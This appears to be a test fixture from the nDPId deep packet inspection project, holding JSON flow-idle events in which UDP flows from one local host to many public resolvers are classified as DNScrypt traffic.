-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337218,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311312,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312180,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312106,"flow_last_seen":946739312136,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311313,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396107,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337186,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317825,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304393,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304394,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391306,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304369,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337190,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312466,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380838,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380832,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59261,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":39259,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
